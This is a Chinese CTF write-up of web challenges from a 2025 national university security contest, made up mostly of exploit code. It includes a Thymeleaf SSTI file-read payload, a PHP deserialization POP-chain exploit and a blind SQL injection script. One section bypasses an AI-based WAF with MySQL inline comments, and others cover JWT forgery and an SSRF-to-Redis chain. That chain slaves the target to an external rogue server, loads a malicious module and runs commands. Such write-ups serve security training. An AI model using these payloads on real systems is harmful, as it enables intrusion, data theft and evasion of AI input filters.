第十九届全国大学生信息安全竞赛(创新实践能力赛)暨第三届“长城杯”网数智安全大赛(防护赛)初赛

[Web]EzJava

弱密码登陆: admin/admin123

Spring框架Thymeleaf SSTI Pyaload

1
2
3
4
5
[[${7*7}]]
49

[[${#ctx}]]
{ip=10.0.0.248, now=2025-12-28T09:58:19.162353, ua=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36, thymeleaf::EvaluationContext=org.thymeleaf.spring5.expression.ThymeleafEvaluationContextWrapper@765801c6}[StandardHTMLInliner]([[${#ctx}]])

EzJava

1
[[${#ctx.getClass().forName("java.nio.file.Files").getMethod("readString", #ctx.getClass().forName("java.nio.file.Path")).invoke(null, #ctx.getClass().forName("java.nio.file.Paths").getMethod("get", #ctx.getClass().forName("java.lang.String"), #ctx.getClass().forName("[Ljava.lang.String;")).invoke(null, "/fl" + "ag_y0u_d0nt_kn0w", #strings.arraySplit("", ",")))}]]

[Web]dedecms

先注册一个账号,发现有一个Aa123456789用户,尝试登陆,发现弱密码:Aa123456789/Aa123456789
upload

dedecms

简单搜索,发现dedecms v5.1 sp2存在相当多漏洞,多数是文件上传,拦截改后缀。随便找上传点,写一个图片马,拦截后缀改php。

[Web]redjs

前几天爆出的React.js漏洞。使用 React2Shell 一把梭。

[Web]hellogate

访问靶机看到一张图片,下载下来发现是图片马。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php
error_reporting(0);
class A {
    public $handle;
    public function triggerMethod() {
        echo "" . $this->handle; 
    }
}
class B {
    public $worker;
    public $cmd;
    public function __toString() {
        return $this->worker->result;
    }
}
class C {
    public $cmd;
    public function __get($name) {
        echo file_get_contents($this->cmd);
    }
}
$raw = isset($_POST['data']) ? $_POST['data'] : '';
header('Content-Type: image/jpeg');
readfile("muzujijiji.jpg");
highlight_file(__FILE__);
$obj = unserialize($_POST['data']);
$obj->triggerMethod();

pop链,写个exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
class A {
    public $handle;
}
class B {
    public $worker;
}
class C {
    public $cmd;
}

$a = new A();
$b = new B();
$c = new C();

$c->cmd = '/flag';
$b->worker = $c;
$a->handle = $b;

echo urlencode(serialize($a));
?>

去POST data拿到flag。

[Web]AI_WAF

带有AI审核的Sql注入。简单摸索,发现-1'||substr(database(),1,1)='a'#可以盲注,写exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from time import sleep
import requests
import string

url = "http://60.205.252.190:34938/search"
headers = {"Content-Type": "application/json"}

# chars = string.digits + string.ascii_letters + "_"
chars = string.ascii_letters + "_"
result = ""
for i in range(1, 20):
    for char in chars:
        # Payload: -1'||substr(database(),1,1)='a'#
        payload = f"-1'||substr(database(),{i},1)='{char}'#"
        data = {"query": payload}
        
        try:
            sleep(1)
            r = requests.post(url, json=data, headers=headers, timeout=3)
            res = r.json()
            print(res)
            count = res.get("count", 0)
            
            if count != 0: 
                result += char
                print(result)
                break
        except Exception as e:
            print("fuck")

print(result)
# nexadata

blind_injection
然后那库名继续盲注,缺发现过不了AI WAF了,考虑其他方法。把database()改成version()盲注,发现是mysql5.

/*!50000 */ 是mysql中的一种特殊版本内联注释,只有当mysql版本满足指定数字(这里的50000代表5.0.0)时,这部分内容才会被当作sql命令执行。这个注释很不常见,可以用来绕过AI Waf。

构造以下payload:

1
-1'/*!50000union*/ /*!50000select*/ 1,(/*!50000select*/ group_concat(table_name) /*!50000from*/ /*!50000information_schema.tables*/ /*!50000where*/ table_schema='nexadata'),3;#

1
获得article,where_is_my_flagggggg

1
-1'/*!50000union*/ /*!50000select*/ 1,(/*!50000select*/ * from nexadata.where_is_my_flagggggg),3;#

2
拿到flag

[Web]Deprecated

参考AsaL1n的wp,发现是原题。

public

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
git clone https://github.com/sammwyy/r2sae
cd r2sae

docker run -it sig2n /bin/bash

root@7f5f15b8bf09:/app# python3 jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAxMjI0fQ.200-7l5FAFAPmXWjvcpPbmxUPHdowPrwdswwuWQAo68D882fCdlAiG54vWx2l3I-iM2mXOVDFxlVnw5A4gzxqxwhtu5RIITQwApDBxGu_3MHdQ10_nvvO8tDv7fFSrC2_kM4VOVEtjabQBgn1OGQfNjAQEeM8m1nxX5qXsyBUEI eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAxMjY0fQ.nnk29Tek8TIcRFEjHmDnC60_cSToSAXPbbD-v3jZJu_bbwG7tBPCHohbz3fvZt4yUmH5vXLDyawJDyaKzfiQFI7LNhr12TInDmiDJRIBNAjKBSDAiXZS37I_lss8ftrJq8olOhkzlCRia5EQUqpp_s08jQe75FKifXM_zuugLE4 eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6IjEiLCJwcml2aWxlZGdlIjoiVGVtcCBVc2VyIiwiaWF0IjoxNzY2OTAxMjgwfQ.aPy4NdsNwghpXlB0PoLohDaM4kgDilHmsnkPl691_dNvwuPyXmpJ4Qzd68wH0zq9oavXckgCim4AiM8p-jtNJA8jwBidR85DePOye73XISAHFb8xC24e0dfvK4pytbmAyfjys8fAPYigU4ATH6ZEY5zOEXSpkWZdM3XFFoR-7XY
[*] GCD:  0x1
[*] GCD:  0xe5f772ebb5363556eaa13c773bcb939090798e1107e90c6b3703c4779a72c3717377248f2d32876270eb767acfa88cfebaa70501bdd58b8b2f5229d1cf0068cd19902d4a9501b9935887fe4e91d8c82b2488f69163ece5fed2ebad57df358feaa93bb39e0ead8e4c77a8d5b7e52474d11e5d0ce58cb8e796e583a2928266e35b
[+] Found n with multiplier 1  :
 0xe5f772ebb5363556eaa13c773bcb939090798e1107e90c6b3703c4779a72c3717377248f2d32876270eb767acfa88cfebaa70501bdd58b8b2f5229d1cf0068cd19902d4a9501b9935887fe4e91d8c82b2488f69163ece5fed2ebad57df358feaa93bb39e0ead8e4c77a8d5b7e52474d11e5d0ce58cb8e796e583a2928266e35b
[+] Written to e5f772ebb5363556_65537_x509.pem
[+] Tampered JWT: b'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.wGAJmzR5DOM6NPMSF4tuKyMxqrUMiQEZ3UXeQBi4MKk'
[+] Written to e5f772ebb5363556_65537_pkcs1.pem
[+] Tampered JWT: b'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.dpXSrmSVXe_4JyAGUm0QvHrWDe3JfKh7uxg6A1p8C18'
================================================================================
Here are your JWT's once again for your copypasting pleasure
================================================================================
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.wGAJmzR5DOM6NPMSF4tuKyMxqrUMiQEZ3UXeQBi4MKk
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ICIxIiwgInByaXZpbGVkZ2UiOiAiVGVtcCBVc2VyIiwgImlhdCI6IDE3NjY5MDEyMjQsICJleHAiOiAxNzY2OTg5MzUzfQ.dpXSrmSVXe_4JyAGUm0QvHrWDe3JfKh7uxg6A1p8C18

拿到公钥后按照wp复现一遍。

[未解出][Web]0o0o0o0o0

1
http://123.56.93.38:28707/data?id=1'union select 1,2,3 and '1'='1

1和2是可控的
0o0o0o0o0
没什么进展了。

[赛后复现][Web]hjppx

SSRF,简单探测发现内网存在redis、mysql以及8080端口的pb-cms。

fetch一下redis,dict://127.0.0.1:6379/info,发现没有密码。使用redis-rogue-server,依照README,依次请求:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#设置备份文件名
action=fetch&url=dict://127.0.0.1:6379/config:set:dbfilename:exp.so

#连接恶意Redis服务器
action=fetch&url=dict://127.0.0.1:6379/slaveof:120.26.146.96:21000

#加载恶意模块
action=fetch&url=dict://127.0.0.1:6379/module:load:./exp.so

#切断主从复制
action=fetch&url=dict://127.0.0.1:6379/slaveof:no:one

#执行系统命令
action=fetch&url=dict://127.0.0.1:6379/system.exec:"ls /"

rce